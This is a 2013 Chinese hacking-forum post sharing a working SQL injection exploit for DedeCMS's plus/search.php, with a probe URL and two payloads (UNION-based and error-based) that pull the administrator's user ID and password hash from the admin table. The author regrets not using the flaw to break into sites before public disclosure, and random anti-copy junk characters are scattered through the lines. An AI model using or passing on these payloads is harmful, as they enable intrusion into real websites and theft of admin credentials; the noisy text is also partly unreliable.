中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]

作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ3 G5 z( Z7 X8 \1 P: W" p( Z; @$ j
. H8 Z% \* o3 C5 t- @* ?* Q
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
1 ?2 J, N# e+ z+ `6 N* `. B  B+ w
% d# S5 q7 G0 d4 L( p0 P: ]3 G既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
: t* \8 s1 Y5 a1 F% x) a! k; Z. j
( _  ?1 w3 Y4 x# Q我一般是这样测试的:
  T- O- t/ [  D  n" P! F( V2 F0 ]! t1 K2 ^1 ~- l: C' V
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a+ [! z5 Y$ ^- C3 s, c+ Y
- e& e4 p+ s) q7 a, l. u. M* d
转载不加作者名的没JJ/ b$ e" O$ D! y2 H+ h( S

9 M! X3 m& J& }) `作者:鬼哥
+ t- c% u) v- p, ^- C( C" H3 D
+ A, |5 f$ e/ C8 Y+ w& O- v8 C$ { # u( V3 T2 u% S+ ]' v: B: I- \. q

  {) X$ e4 U! {3 B) v看结果如果提示- B4 S3 z& W' ]" d: @

9 _( Y/ O( a8 C4 I  _Safe Alert: Request Error step 2 !3 B0 e/ o( c, j3 q3 @$ E: }
) T" g2 C% V, x, ?: G1 [
那么直接用下面的exp2 v, C3 L& R( w% f

5 I) @$ G. r4 `, D; D7 Rxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a9 z- A. `* y7 b' G' W) W% d+ B
3 b5 w, m* w" e0 N* T; u, w
4 _, i' ?& l9 f- l& [
看结果如果提示- T9 O) ?. y4 f; s' e$ Z

, y6 A; ]  w# A- {& D7 N1 q2 ?! ?Safe Alert: Request Error step 1 !
$ H. ^3 j7 ]) F% ?5 `
& l  i) c: [# i% B+ e. r那么直接用下面的exp6 Z3 C. k: s5 \3 \* [! u

' {' q# S2 Q0 b0 E3 ^xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
; z4 s4 @3 f, Q0 n- E. J. }9 d( D6 K* K+ Z9 @- ?

* o" a. w8 F0 s1 ^! Z4 j, p/ X如果正常显示证明漏洞不存在了。, @/ L/ I" R9 C- X0 e
1 r2 F! B4 G* R
转载不加作者名的没JJ




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2